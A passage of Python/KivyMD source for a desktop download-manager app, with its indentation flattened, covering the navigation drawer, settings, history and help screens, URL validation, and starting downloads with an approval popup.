Clock.schedule_interval(self.app_essentials_update, 1 / 99)
def home_tab_init(self):
# home tab
home_tab = Screen(name="home")
self.manager.add_widget(home_tab)
self.home = BoxLayout(orientation="vertical")
self.navbar = MDCard()
self.navbar.size_hint = (1, None)
self.navbar.height = dp(40)
self.home.add_widget(self.navbar)
threading.Thread(self.navbar_init()).start()
threading.Thread(self.top_bar_init()).start()
threading.Thread(self.info_bar_init()).start()
threading.Thread(self.download_frame_init()).start()
home_tab.add_widget(self.home)
# drawer
self.drawer = MDNavigationDrawer()
self.drawer.md_bg_color = (.16, .55, 1, .3)
threading.Thread(self.drawer_content_init()).start()
home_tab.add_widget(self.drawer)
def top_bar_init(self):
# the drop down for the link box
self.dropdown = MDDropdownMenu(width_mult=100)
self.dropdown.background_color = get_sub_theme_color(essence="tuple")
self.dropdown.position = "bottom"
self.dropdown.border_margin = 0
# the dropdown function
def drop(instance, touch):
if touch.button == "right":
if self.nav_link.focus:
self.dropdown.open()
# the top bar
text_bx = BoxLayout(orientation="horizontal", size_hint=(1, None), height=dp(40))
self.nav_link = TextInput(size_hint=(1, 1), multiline=False)
self.nav_link.background_active = ""
self.nav_link.foreground_color = (1, 1, 1, 1)
self.nav_link.background_normal = ""
self.nav_link.font_name = "Assets/Fonts/Roboto-Light.ttf"
self.nav_link.font_size = 18
# self.nav_link.border = (10, 5, 5, 5)
self.nav_link.hint_text = "Paste Link Here: Right click for more options"
self.nav_link.on_text_validate = self.checker
# menu items for the dropdown
menu_items = [
{
"text": "Paste",
"viewclass": "OneLineListItem",
"on_release": lambda :self.copy_paste_empty(receiver="nav_link", action="paste")
},
{
"text": "Cancel",
"viewclass": "OneLineListItem",
"on_release": lambda :self.copy_paste_empty(receiver="nav_link", action="empty")
},
{
"text": "Copy",
"viewclass": "OneLineListItem",
"on_release": lambda :self.copy_paste_empty(receiver="nav_link", action="copy")
},
{
"text": "Enter",
"viewclass": "OneLineListItem",
"on_release": self.checker
}
]
self.dropdown.items = menu_items
text_bx.ids['nav_link'] = self.nav_link
self.dropdown.caller = text_bx.ids.nav_link
self.nav_link.bind(on_touch_down=drop)
# the enter button
self.enter_bt = Button(text="Enter", size_hint=(.1, 1), on_press=lambda obj: self.checker())
self.enter_bt.background_normal = ""
self.enter_bt.background_down = ""
self.enter_bt.font_name = "Assets/Fonts/DroidSans.ttf"
text_bx.add_widget(self.nav_link)
text_bx.add_widget(self.enter_bt)
self.home.add_widget(text_bx)
def navbar_init(self):
# the navigation bar
self.navbar.add_widget(FlatButton(text="File", on_press=lambda obj: threading.Thread(target = lambda :self.toggle_drawer()).start()))
self.download_popup()
self.navbar.add_widget(FlatButton(text="Download", on_press=lambda obj: threading.Thread(target= lambda :self.download_pop.pop()).start()))
self.navbar.add_widget(FlatButton(text="Settings", on_press=lambda obj: threading.Thread(target=lambda :self.change_tab("settings")).start()))
self.navbar.add_widget(FlatButton(text="History", on_press=lambda obj: threading.Thread(target=lambda :self.change_tab("history")).start()))
self.navbar.add_widget(FlatButton(text="Help", on_press=lambda obj: threading.Thread(target=lambda :self.change_tab("help")).start()))
def info_bar_init(self):
# the info bar
infobar = MDCard(size_hint=(1, None), height=dp(20))
self.home.add_widget(infobar)
# the information
infobar.add_widget(self.con_label)
infobar.add_widget(self.down_label)
infobar.add_widget(self.finished_label)
infobar.add_widget(self.error_label)
infobar.add_widget(self.paused_label)
def drawer_content_init(self):
# the sliding menu
drawer_bg = BoxLayout(orientation="vertical")
stats_box = BoxLayout(pos_hint={'top': 1}, size_hint=(1, .2), padding=(10, 10, 10, 10), spacing=(10, 10))
downloads_box = BoxLayout()
downloads_card = MDCard(size_hint=(1, 1), pos_hint={'x': 0, 'y': 0}, orientation="vertical", radius=5)
downloads_card.md_bg_color = (.16, .55, 1, 1)
downloads_card.add_widget(Label(pos_hint={'x': 0, 'y': .7}, height=dp(52), size_hint=(1, None), font_size=50,
text=str(shorten_int(Config.total_downloads, 100, pd="99+"))))
downloads_card.add_widget(Label(size_hint=(1, None), height=dp(25), text="Downloads"))
downloads_box.add_widget(downloads_card)
stats_box.add_widget(downloads_box)
tab_a = Widget(size_hint=(.1, 1))
stats_box.add_widget(tab_a)
total_size_box = BoxLayout()
total_size_card = MDCard(size_hint=(1, 1), pos_hint={'x': 0, 'y': 0})
total_size_card.orientation = "vertical"
total_size_card.radius = 5
total_size_card.md_bg_color = (1, .4, .5, 1)
total_size_card.add_widget(Label(pos_hint={'x': 0, 'y': .7}, height=dp(52), size_hint=(1, None), font_size=17,
text=str(get_standard_size(Config.total_sizes))))
total_size_card.add_widget(Label(size_hint=(1, None), height=dp(25), text="Total Size"))
total_size_box.add_widget(total_size_card)
stats_box.add_widget(total_size_box)
tab_b = Widget(size_hint=(.1, 1))
stats_box.add_widget(tab_b)
total_speed_box = BoxLayout()
total_speed_card = MDCard(size_hint=(1, 1), pos_hint={'x': 0, 'y': 0})
total_speed_card.radius = 5
total_speed_card.orientation = "vertical"
total_speed_card.md_bg_color = (.5, 1, .4, 1)
total_speed_card.add_widget(Label(pos_hint={'x': 0, 'y': .7}, height=dp(52), size_hint=(1, None), font_size=17,
text=str(get_standard_size(Config.total_speeds)) + "/s"))
total_speed_card.add_widget(Label(size_hint=(1, None), height=dp(25), text="Total Speed"))
total_speed_box.add_widget(total_speed_card)
stats_box.add_widget(total_speed_box)
drawer_bg.add_widget(stats_box)
button_box = BoxLayout(orientation="vertical", padding=(5, 10, 0, 5))
inf_label = MDLabel(text="Categories")
inf_label.color = (1, 1, 1, 1)
inf_label.font_name = "Assets/Fonts/FiraCode-Bold.ttf"
inf_label.font_size = dp(25)
button_box.add_widget(inf_label)
all_down = MDCard(size_hint=(1, 1))
all_bt = Button(text="Show all downloads", on_press=lambda obj: threading.Thread(target=lambda :self.change_download_tab("all")).start(),
background_normal="", background_color="8F8D8A", on_release=lambda obj: threading.Thread(target=lambda :self.toggle_drawer()).start())
all_down.add_widget(all_bt)
button_box.add_widget(all_down)
finished_down = MDCard(size_hint=(1, 1))
fin_bt = Button(text="Show finished downloads", on_press=lambda obj: threading.Thread(target=lambda :self.change_download_tab("finished")).start(),
background_normal="", background_color="8F8D8A", on_release=lambda obj: threading.Thread(target=lambda :self.toggle_drawer()).start())
finished_down.add_widget(fin_bt)
button_box.add_widget(finished_down)
down_down = MDCard(size_hint=(1, 1))
down_bt = Button(text="Show downloading", on_press=lambda obj: threading.Thread(target=lambda :self.change_download_tab("downloading")).start(),
background_normal="", background_color="8F8D8A", on_release=lambda obj: threading.Thread(target=lambda :self.toggle_drawer()).start())
down_down.add_widget(down_bt)
button_box.add_widget(down_down)
paused_down = MDCard(size_hint=(1, 1))
paused_bt = Button(text="Show all paused downloads", on_press=lambda obj: threading.Thread(target=lambda :self.change_download_tab("paused")).start(),
background_normal="", background_color="8F8D8A", on_release=lambda obj: threading.Thread(target=lambda :self.toggle_drawer()).start())
paused_down.add_widget(paused_bt)
button_box.add_widget(paused_down)
error_down = MDCard(size_hint=(1, 1))
error_bt = Button(text="Show all Error downloads", on_press=lambda obj: threading.Thread(target =lambda :self.change_download_tab("error")).start(),
background_normal="", background_color="8F8D8A", on_release=lambda obj: threading.Thread(self.toggle_drawer()).start())
error_down.add_widget(error_bt)
button_box.add_widget(error_down)
ess_label = MDLabel(text="Essentials")
ess_label.color = (1, 1, 1, 1)
ess_label.font_name = "Assets/Fonts/FiraCode-Bold.ttf"
ess_label.font_size = dp(25)
button_box.add_widget(ess_label)
settings = MDCard()
set_bt = Button(text="Change App Settings", on_press=lambda obj: self.toggle_drawer())
set_bt.bind(on_press=lambda obj: self.change_tab("settings"))
set_bt.background_normal = ""
set_bt.background_color = "#3A9259"
settings.add_widget(set_bt)
button_box.add_widget(settings)
history = MDCard()
hist_bt = Button(text="Show Download Histories", on_press=lambda obj: self.toggle_drawer())
hist_bt.bind(on_press=lambda obj: self.change_tab("history"))
hist_bt.background_normal = ""
hist_bt.background_color = "#FF9BA0"
history.add_widget(hist_bt)
button_box.add_widget(history)
help_bt_card = MDCard()
help_bt = Button(text="Find Help", on_press=lambda obj: self.change_tab("help"))
help_bt.bind(on_press=lambda obj: self.toggle_drawer())
help_bt.background_normal = ""
help_bt.background_color = "#6AAFFF"
help_bt_card.add_widget(help_bt)
button_box.add_widget(help_bt_card)
sys_bt_card = MDCard()
sys_bt = Button(text="Exit App")
sys_bt.background_normal = ""
sys_bt.background_color = "#FF5356"
sys_bt_card.add_widget(sys_bt)
button_box.add_widget(sys_bt_card)
drawer_bg.add_widget(button_box)
inf_label = MDLabel(text="Information")
inf_label.color = (1, 1, 1, 1)
inf_label.font_name = "Assets/Fonts/FiraCode-Bold.ttf"
inf_label.font_size = dp(25)
button_box.add_widget(inf_label)
sys_inf = PopupBox(essence="central", title="System Information",
bg_color=get_main_theme_color(essence="string"))
sys_inf_box = BoxLayout(orientation="horizontal")
sys_lbl_bx = BoxLayout(size_hint=(.45, 1), orientation='vertical')
sys_lbl_bx.add_widget(MDLabel(text="Operating System"))
sys_lbl_bx.add_widget(MDLabel(text="OS Version"))
sys_lbl_bx.add_widget(MDLabel(text="System Architecture"))
sys_lbl_bx.add_widget(MDLabel(text="System Processor"))
sys_lbl_bx.add_widget(MDLabel(text="Machine"))
sys_inf_box.add_widget(sys_lbl_bx)
sys_cor_bx = BoxLayout(orientation="vertical")
sys_cor_bx.add_widget(MDLabel(text=platform.system()))
sys_cor_bx.add_widget(MDLabel(text=platform.version()))
sys_cor_bx.add_widget(MDLabel(text=platform.architecture()[0]))
sys_cor_bx.add_widget(MDLabel(text=platform.processor()))
sys_cor_bx.add_widget(MDLabel(text=platform.machine()))
sys_inf_box.add_widget(sys_cor_bx)
sys_inf.content(sys_inf_box)
sys_bt_card = MDCard()
sys_bt = Button(text="System Information", on_press=lambda obj: sys_inf.pop())
sys_bt.background_normal = ""
sys_bt.background_color = "#FF5356"
sys_bt_card.add_widget(sys_bt)
button_box.add_widget(sys_bt_card)
app_inf = PopupBox(essence="central", title="App Information", bg_color=get_main_theme_color(essence="string"))
app_inf_box = BoxLayout(orientation="horizontal")
app_lbl_bx = BoxLayout(size_hint=(.45, 1), orientation='vertical')
app_lbl_bx.add_widget(MDLabel(text="App Version"))
app_lbl_bx.add_widget(MDLabel(text="Product ID"))
app_lbl_bx.add_widget(MDLabel(text="Last Update"))
app_lbl_bx.add_widget(MDLabel(text="App Flavor"))
app_lbl_bx.add_widget(MDLabel(text="App Release Date"))
app_inf_box.add_widget(app_lbl_bx)
app_cor_bx = BoxLayout(orientation="vertical")
app_cor_bx.add_widget(MDLabel(text=Config.app_version))
app_cor_bx.add_widget(MDLabel(text=Config.product_id))
app_cor_bx.add_widget(MDLabel(text=Config.last_update))
app_cor_bx.add_widget(MDLabel(text=str(Config.flavour)))
app_cor_bx.add_widget(MDLabel(text=Config.release_date))
app_inf_box.add_widget(app_cor_bx)
app_inf.content(app_inf_box)
app_bt_card = MDCard()
app_bt = Button(text="App Information", on_press=lambda obj: app_inf.pop())
app_bt.background_normal = ""
app_bt.background_color = "#FF5356"
app_bt_card.add_widget(app_bt)
button_box.add_widget(app_bt_card)
inf_card = MDCard()
inf_card.size_hint = (1, None)
inf_card.height = dp(100)
inf_card.orientation = "vertical"
lab = MDLabel(text="Geliana Software Incorporated")
lab.font_size = 20
lab_ad = MDLabel(text="Nairobi, Kenya")
lab_rt = MDLabel(text="All Rights Reserved")
lab_cr = MDLabel(text="Copyright @2021")
lab_vs = MDLabel(text="Version " + str(Config.app_version))
inf_card.add_widget(lab)
inf_card.add_widget(lab_ad)
inf_card.add_widget(lab_rt)
inf_card.add_widget(lab_cr)
inf_card.add_widget(lab_vs)
button_box.add_widget(inf_card)
self.drawer.add_widget(drawer_bg)
def download_frame_init(self):
self.home.add_widget(self.download_frame)
self.download_frame.add_widget(self.download_frame_manager)
self.all_downloads_tab.name = "all"
self.download_frame_manager.add_widget(self.all_downloads_tab)
self.init_download_tabs()
self.downloading_tab.name = "downloading"
self.download_frame_manager.add_widget(self.downloading_tab)
self.paused_download_tab.name = "paused"
self.download_frame_manager.add_widget(self.paused_download_tab)
self.error_downloads_tab.name = "error"
self.download_frame_manager.add_widget(self.error_downloads_tab)
self.finished_downloads_tab.name = "finished"
self.download_frame_manager.add_widget(self.finished_downloads_tab)
def change_download_tab(self, tab):
self.download_frame_manager.current = tab
def toggle_drawer(self):
self.drawer.set_state("toggle")
def settings_tab_init(self):
settings_tab = Screen(name="settings")
self.manager.add_widget(settings_tab)
self.back_st = Button(text="Back", on_press=lambda obj: self.change_tab("home"), size_hint=(None, None))
self.back_st.background_normal = ""
self.back_st.height = dp(50)
self.back_st.width = dp(200)
self.back_st.pos_hint = {'x': 0, 'y': .93}
settings_tab.add_widget(self.back_st)
settings_tab.add_widget(Image(source="Assets/Media/settings.png", size_hint=(None, None), height=dp(50),
width=dp(50), pos_hint={'x': .21, "y": .93}))
settings_tab.add_widget(
Label(text="Settings", size_hint=(None, None), size=(dp(150), dp(50)), font_size=40, halign="left",
font_name="Assets/Fonts/Roboto-Light.ttf", pos_hint={"x": .265, "y": .93}))
settings_tab.add_widget(
Button(text="Restore Defaults", size_hint=(.2, None), height=dp(34), background_normal="",
background_color="04B5E6", pos_hint={'x': .45, 'y': .93},
on_press=lambda obj: restore_default_settings_query()))
settings_tab.add_widget(
Button(text="Cancel", size_hint=(.15, None), height=dp(35), background_color="FF5356", background_normal="",
pos_hint={'x': .68, 'y': .93}, on_press=lambda obj: cancel_new_settings()))
settings_tab.add_widget(Button(text="Save", size_hint=(.15, None), height=dp(35), background_color="#3A9259",
background_normal="", pos_hint={'x': .85, 'y': .93},
on_press=lambda obj: save_new_settings_query()))
self.settings_holder.size_hint = (1, .92)
self.settings_holder.pos_hint = {"x": 0, "y": 0}
settings_tab.add_widget(self.settings_holder)
self.settings_holder.add_widget(settings_bg_scroll)
def history_tab_init(self):
history = Screen(name="history")
top = BoxLayout(size_hint=(1, .05), pos_hint={'x': 0, 'y': .93})
self.back_hst = Button(text="Back", on_press=lambda obj: multiprocessing.Process(self.change_tab("home")).start, size_hint=(None, None))
self.back_hst.background_normal = ""
self.back_hst.height = dp(50)
self.back_hst.width = dp(200)
top.add_widget(self.back_hst)
top.add_widget(Image(source="Assets/Media/history.png", size_hint=(None, None), height=dp(50),
width=dp(50)))
top.add_widget(
Label(text="History", size_hint=(None, None), size=(dp(150), dp(50)), font_size=40, halign="left",
font_name="Assets/Fonts/Roboto-Light.ttf"))
top.add_widget(Widget())
top.add_widget(
Button(text="Clear All Histories", size_hint=(None, None), background_normal="", background_down="", background_color="FF5356",
height=dp(50), width=dp(250), pos_hint={'x': .45, 'y': 0}, on_press=lambda obj: threading.Thread(target=lambda :delete_it()).start())
)
def deleting_download():
self.history_holder.clear_widgets()
multiprocessing.Process(target=p.StorageAPI().delete_all_data()).start()
SnackBar(essence="extra", message="Record Deleted", bg_color=get_sub_theme_color(essence="tuple"))
def delete_it():
if not p.KeyMatch().match("save_down_proc"):
deleting_download()
elif p.KeyMatch().match("save_down_proc"):
box = PopupBox(essence="central", title="Cancel Download",
bg_color=get_sub_theme_color(essence="string"),
escape=False)
def leave(obj):
str(obj)
box.exit()
bottom = BoxLayout(size_hint=(1, .92))
stroller = ScrollView()
stroller.bar_color = "298AFF"
stroller.bar_width = 5
stroller.do_scroll_y = True
self.history_holder = BoxLayout(size_hint=(1, None), orientation="vertical")
def hst():
for i in p.StorageAPI().get_all_ids():
self.history_tabs(i)
threading.Thread(target=lambda: hst()).start()
history.add_widget(top)
history.add_widget(bottom)
bottom.add_widget(stroller)
stroller.add_widget(self.history_holder)
self.manager.add_widget(history)
def update_history(delta_time):
self.history_holder.height = len(p.StorageAPI().get_all_ids()) * 100
Clock.schedule_interval(update_history, 1 / 99999999999)
def open_help(self, obj):
str(obj)
self.manager.current = "help"
SnackBar(essence="extra", message="Help", bg_color=get_sub_theme_color(essence="tuple"))
def open_history(self, obj):
str(obj)
self.manager.current = "history"
SnackBar(essence="extra", message="History", bg_color=get_sub_theme_color(essence="tuple"))
def error_downloads_screen_content(self):
holder_bx = BoxLayout(orientation="vertical")
down_box = BoxLayout(size_hint=(1, .07))
# the Label
down_info_label = MDLabel(text="Error Downloads", font_name="Assets/fonts/FiraCode-Bold.ttf", size_hint=(.3, 1),
pos_hint={'x': .2, 'y': 0})
down_box.add_widget(down_info_label)
down_info_label.color = (1, 1, 1, 1)
down_info_label.font_size = dp(25)
down_info_no_label = MDLabel(text="0", font_name="Assets/fonts/FiraCode-Bold.ttf", size_hint=(.1, 1))
down_box.add_widget(down_info_no_label)
down_info_no_label.color = (1, 1, 1, 1)
down_info_no_label.font_size = dp(15)
left = MDIconButton(icon="arrow-left-bold-hexagon-outline", on_press=self.open_finished_download_screen)
down_box.add_widget(left)
holder_bx.add_widget(down_box)
scroll_all = ScrollView()
scroll_all.bar_color = "298AFF"
scroll_all.bar_width = 5
scroll_all.do_scroll_y = True
self.error_downloads_box = BoxLayout(orientation="vertical", size_hint=(1, None))
# adding widgets
self.error_downloads_screen.add_widget(holder_bx)
holder_bx.add_widget(scroll_all)
scroll_all.add_widget(self.error_downloads_box)
def mini_update(delta_t):
str(delta_t)
down_info_no_label.text = str(self.errors)
Clock.schedule_interval(mini_update, 1 / 99999999999)
def help_tab_init(self):
help_tab = Screen(name="help")
self.manager.add_widget(help_tab)
self.back_hp = Button(text="Back", on_press=lambda obj: multiprocessing.Process(self.change_tab("home")).start(), size_hint=(None, None))
self.back_hp.background_normal = ""
self.back_hp.height = dp(50)
self.back_hp.width = dp(200)
self.back_hp.pos_hint = {'x': 0, 'y': .93}
help_tab.add_widget(self.back_hp)
help_tab.add_widget(Image(source="Assets/Media/help.png", size_hint=(None, None), height=dp(50),
width=dp(50), pos_hint={'x': .21, "y": .93}))
help_tab.add_widget(
Label(text="Help", size_hint=(None, None), size=(dp(150), dp(50)), font_size=40, halign="left",
font_name="Assets/Fonts/Roboto-Light.ttf", pos_hint={"x": .25, "y": .93}))
def change_tab(self, tab):
if tab == "home":
if not affirm_settings():
save_new_settings_query()
elif affirm_settings():
self.manager.current = tab
elif tab == "history":
self.manager.current = tab
else:
self.manager.current = tab
def app_essentials_update(self, delta_t):
str(delta_t)
"""The customized tabs labels that show the stats"""
all_label.text = str(self.downloads + self.errors + self.paused + self.finished)
downloading_label.text = str(self.downloads)
paused_label.text = str(self.paused)
error_label.text = str(self.errors)
finished_label.text = str(self.finished)
# update the downloads box in the mini-tabs
all_downloads_box.height = self.downloads * 100
# themes and colors
self.theme = get_main_theme_color(essence="tuple")
self.drawer.md_bg_color = get_main_theme_color(essence="tuple")
self.enter_bt.background_color = get_sub_theme_color(essence="string")
self.nav_link.background_color = get_transparent_sub_theme_color(essence="string")
self.nav_link.hint_text_color = "#FFFFFF"
self.back_st.background_color = get_transparent_sub_theme_color(essence="string")
self.back_hst.background_color = get_transparent_sub_theme_color(essence="string")
self.back_hp.background_color = get_transparent_sub_theme_color(essence="string")
# info bar statistics
# checking for internet connection
if check_network_connection():
self.con_label.text = "Internet connected"
self.con_label.color = "#298AFF"
else:
self.con_label.text = "No Connection"
self.con_label.color = "#FF0500"
# check for any errors encountered
if self.errors == 1:
self.error_label.color = "#FF0500"
self.error_label.text = str(self.errors) + " Error"
elif self.errors > 1:
self.error_label.color = "#FF0500"
self.error_label.text = str(self.errors) + " Errors"
elif self.errors < 1:
self.error_label.color = "#00920F"
self.error_label.text = "No errors"
# check for any finished procedures
if self.finished > 0:
self.finished_label.text = str(self.finished) + " Finished"
self.finished_label.color = "#298AFF"
elif self.finished == 0:
self.finished_label.color = "#00920F"
self.finished_label.text = "None Finished"
# check for any downloading procedures
if self.downloads > 0:
self.down_label.text = str(self.downloads) + " Downloading.."
self.down_label.color = "#298AFF"
elif self.downloads == 0:
self.down_label.text = "None Downloading"
self.down_label.color = "#00920F"
# check for any paused downloads
if self.paused > 0:
self.paused_label.text = str(self.paused) + " Paused"
self.paused_label.color = "#298AFF"
elif self.paused == 0:
self.paused_label.color = "#00920F"
self.paused_label.text = "None Paused"
def download_popup(self):
self.download_pop = PopupBox(essence="central", title="Input URL", bg_color=get_sub_theme_color("string"),
escape=False)
download_inner = FloatLayout()
download_inner.add_widget(Label(text="Link", size_hint=(None, None), height=dp(25), width=dp(25),
pos_hint={'x': 0, 'y': .75}))
self.url_box = MDTextField(mode="rectangle", hint_text="Paste url here", multiline=False)
self.url_box.background_disabled_normal = ""
self.url_box.font_name = "Assets/Fonts/JetBrainsMono-Thin.ttf"
self.url_box.background_color = '#BECAFF'
self.url_box.background_normal = ""
self.url_box.size_hint = (.6, .2)
self.url_box.pos_hint = {'x': .2, 'y': .75}
self.url_box.on_text_validate = self.download_pop.exit
self.url_box.on_text_validate = self.checker
download_inner.add_widget(
Button(text="Paste", size_hint=(None, None), height=dp(30), width=dp(70), pos_hint={'x': .85, 'y': .75},
on_press=lambda obj: self.copy_paste_empty(receiver="url_box", action="paste")))
download_inner.add_widget(self.url_box)
download_inner.add_widget(
Label(text="Directory", size_hint=(None, None), height=dp(25), width=dp(25), pos_hint={'x': .03, 'y': .45}))
self.dir_input = MDTextField(text=p.KeyMatch().match("directory"))
self.dir_input.mode = "rectangle"
self.dir_input.hint_text = "directory"
self.dir_input.multiline = False
self.dir_input.background_normal = ""
self.dir_input.size_hint = (.6, .2)
download_inner.add_widget(
Button(text="Change", size_hint=(None, None), pos_hint={'x': .85, 'y': .45}, height=dp(30),
width=dp(70), on_press=lambda obj: self.change_directory()))
self.dir_input.pos_hint = {'x': .2, 'y': .45}
download_inner.add_widget(self.dir_input)
download_inner.add_widget(
Button(text="Cancel", on_press=lambda obj: self.download_pop.exit(), background_normal="",
background_color="#FF5356", size_hint=(None, None), height=dp(25), pos_hint={'x': 0, 'y': 0},
on_release=lambda obj: self.copy_paste_empty("url_box", action="empty")))
download_enter = Button(on_press=lambda obj: threading.Thread(target=lambda :self.download_pop.exit()).start(), text="Proceed",
background_color="#0976FF", size_hint=(None, None), background_normal="", height=dp(25),
pos_hint={'x': .79, 'y': 0})
download_enter.bind(on_press=lambda obj: threading.Thread(target=lambda :self.checker()))
download_inner.add_widget(download_enter)
self.download_pop.content(content=download_inner)
def copy_paste_empty(self, receiver, action):
if receiver == "nav_link":
if action == "paste":
self.nav_link.text = paste_data()
elif action == "copy":
copy_data(self.nav_link.text)
elif action == "empty":
self.nav_link.text = ""
elif receiver == "url_box":
if action == "paste":
self.url_box.text = paste_data()
elif action == "copy":
copy_data(self.url_box.text)
elif action == "empty":
self.url_box.text = ""
def change_directory(self):
root = tk.Tk()
root.iconbitmap("Assets/Media/downloader.ico")
root.withdraw()
folder = filedialog.askdirectory()
if folder == "" or folder is None:
self.dir_input.text = p.KeyMatch().match("directory")
SnackBar(essence="info", message="Directory reverted to original", bg_color=get_main_theme_color("tuple"))
else:
self.dir_input.text = folder
SnackBar(essence="info", message="Directory changed", bg_color=get_main_theme_color("tuple"))
def checker(self):
# this checker is used to look for the actual url where it has been placed either in the nav_link textinput or in the download popup
#it also checks for empty input from both textinputs, internet connection and url validity
importlib.reload(p)
#Refresh the preferences
if not self.nav_link.text and not self.url_box.text:
PopupBox(essence="warn", error_code="URL345", message="Failure: No URL was encountered", beep=True).pop()
elif not check_network_connection(use="external"):
PopupBox(essence="warn", error_code="NT101", message="Failure: No Internet Connection", beep=True).pop()
else:
if self.nav_link.text:
if not check_link_validity(url=self.nav_link.text, use="external"):
PopupBox(essence="warn", error_code="URL201", message="Failure: Invalid URL",
beep=True).pop()
self.nav_link.text = ""
else:
self.confirmer(self.nav_link.text, p.KeyMatch().match("directory"))
self.nav_link.text = ""
elif self.url_box.text:
if not check_link_validity(url=self.url_box.text, use="external"):
PopupBox(essence="warn", error_code="URL202", message="Failure: Invalid URL",
beep=True).pop()
self.url_box.text = ""
else:
self.confirmer(self.url_box.text, self.dir_input.text)
self.url_box.text = ""
def confirmer(self, url, place):
tag = create_random_characters()
identifier = create_random_characters()
pid = create_random_characters()
thread = TellyEngine(url=url, directory=place, tag=tag, identifier=identifier, process_id=pid)
if p.KeyMatch().match("approval"):
affirm = PopupBox(essence="central", title="Approve Download",
bg_color=get_sub_theme_color(essence="string"),
escape=False)
background = BoxLayout(orientation="vertical")
top = BoxLayout()
stat_box = BoxLayout(size_hint=(.75, 1), orientation="vertical")
name_box = BoxLayout()
file_name_label = MDLabel(text="Name: ", size_hint=(.3, 1))
file_name = MDLabel(text="Waiting....")
dir_box = BoxLayout()
dir_name_label = MDLabel(text="Directory: ", size_hint=(.3, 1))
dir_name = MDLabel(text=shorten_string(place, 37))
dir_name.color = "E0E3E6"
link_box = BoxLayout()
link_name_label = MDLabel(text="Link: ", size_hint=(.3, 1))
link_name = MDLabel(text=shorten_string(url, 37))
link_name.color = "E0E3E6"
size_box = BoxLayout()
link_size_label = MDLabel(text="Size: ", size_hint=(.3, 1))
link_size = MDLabel(text="Waiting")
link_size.color = "E0E3E6"
info_box = BoxLayout(size_hint=(.25, 1), orientation="vertical")
pic_box = BoxLayout()
file_icon = Image(size_hint=(.6, .6), pos_hint={'x': 0, 'y': .2})
media_type_box = BoxLayout(size_hint=(1, .3))
media_type_label = Label(text="Waiting....", size_hint=(1, 1))
bottom = BoxLayout(size_hint=(1, .3))
c_cancel = Button(text="Cancel", on_press=lambda obj: affirm.exit(), size_hint=(None, None), height=dp(30),
background_normal="")
c_cancel.background_color = "#FF5356"
c_proceed = Button(text="Proceed",
on_press=lambda obj: threading.Thread(target=lambda :self.init_download(sequence=thread)).start(),
size_hint=(None, None),
background_normal="", on_release=lambda obj: threading.Thread(target=lambda :affirm.exit()).start())
c_proceed.background_color = "#0976FF"
c_proceed.pos_hint = {'x': .8, 'y': 0}
c_proceed.height = dp(30)
def get_essentials():
file_name.text = shorten_string(thread.get_name(), 37)
file_name.color = "E0E3E6"
link_size.text = str(get_standard_size(int(thread.get_size())))
link_size.color = "E0E3E6"
media_type_label.text = thread.get_media()
media_type_label.color = "E0E3E6"
def get_icon():
file_icon.source = check_type(thread.get_media(), thread.get_file_extension())
get_icon()
def update(delta):
str(delta)
get_essentials()
Clock.schedule_interval(update, 1 / 999999999999)
background.add_widget(top)
top.add_widget(stat_box)
name_box.add_widget(file_name_label)
name_box.add_widget(file_name)
dir_box.add_widget(dir_name_label)
dir_box.add_widget(dir_name)
link_box.add_widget(link_name_label)
link_box.add_widget(link_name)
stat_box.add_widget(name_box)
stat_box.add_widget(dir_box)
stat_box.add_widget(link_box)
stat_box.add_widget(size_box)
size_box.add_widget(link_size_label)
size_box.add_widget(link_size)
top.add_widget(info_box)
info_box.add_widget(pic_box)
pic_box.add_widget(file_icon)
info_box.add_widget(media_type_box)
media_type_box.add_widget(media_type_label)
background.add_widget(bottom)
bottom.add_widget(c_cancel)
bottom.add_widget(Widget())
bottom.add_widget(c_proceed)
affirm.pop()
affirm.content(content=background)
elif not p.KeyMatch().match("approval"):
self.init_download(sequence=thread)
def init_download(self, sequence):
if sequence.confirm_existence():
self.add_download_tab("all", sequence)
elif not sequence.confirm_existence():
PopupBox(essence="warn", title="Error Sequence", error_code="SEQ124", message="invalid sequence", beep=True).pop()
def add_download_tab(self, receiver, sequence):
if receiver == "all":
open(sequence.get_file_location_name(), "w")
self.start_download(sequence)
all_downloads_box.add_widget(self.all_downloads_downloading_tab(sequence), index=self.downloads - 1)
def start_download(self, sequence):
SnackBar(essence="info", message="Download Started", bg_color=get_main_theme_color("tuple"))
self.downloads += 1
today_date = dt.date.today()
time_now = dt.datetime.now()
self.in_service_pids.append(sequence.get_process_identifier())
detail = {'id': sequence.get_identifier(),
'tag': sequence.get_tag(),
'pid': sequence.get_process_identifier(),
'url': sequence.get_url(),
'name': sequence.get_name(),
'size': sequence.get_size(),
'media': sequence.get_media(),
'secondary_location': "downloading_screen",
'directory': sequence.get_directory(),
'timestamp': {'start_date': f"{today_date:%A, %B %d, %Y}", 'start_time': f"{time_now: %I:%M %p}",
'finish_date': "", 'finish_time': ""}}
p.StorageAPI().add_data(detail)
sequence.download_file()
def init_download_tabs(self):
self.all_downloads_tab.add_widget(all_downloads_bg)
all_paused.bind(on_press=lambda obj: self.change_download_tab("paused"))
all_downloading.bind(on_press=lambda obj: self.change_download_tab("downloading"))
all_finished.bind(on_press=lambda obj: self.change_download_tab("finished"))
all_error.bind(on_press=lambda obj: self.change_download_tab("error"))
self.downloading_tab.add_widget(downloading_bg)
downloading_all.bind(on_press=lambda obj: self.change_download_tab("all"))
downloading_paused.bind(on_press=lambda obj: self.change_download_tab("paused"))
downloading_finished.bind(on_press=lambda obj: self.change_download_tab("finished"))
downloading_error.bind(on_press=lambda obj: self.change_download_tab("error"))
self.paused_download_tab.add_widget(paused_bg)
paused_all.bind(on_press=lambda obj: self.change_download_tab("all"))
paused_downloading.bind(on_press=lambda obj: self.change_download_tab("downloading"))
paused_finished.bind(on_press=lambda obj: self.change_download_tab("finished"))
paused_error.bind(on_press=lambda obj: self.change_download_tab("error"))
self.error_downloads_tab.add_widget(error_bg)
error_all.bind(on_press=lambda obj: self.change_download_tab("all"))
error_downloading.bind(on_press=lambda obj: self.change_download_tab("downloading"))
error_finished.bind(on_press=lambda obj: self.change_download_tab("finished"))
error_paused.bind(on_press=lambda obj: self.change_download_tab("paused"))
self.finished_downloads_tab.add_widget(finished_bg)
finished_all.bind(on_press=lambda obj: self.change_download_tab("all"))
finished_downloading.bind(on_press=lambda obj: self.change_download_tab("downloading"))
finished_error.bind(on_press=lambda obj: self.change_download_tab("error"))
finished_paused.bind(on_press=lambda obj: self.change_download_tab("paused"))
def all_downloads_downloading_tab(self, sequence):
# Downloadtab styling
downloadtab = BoxLayout(orientation="horizontal", )
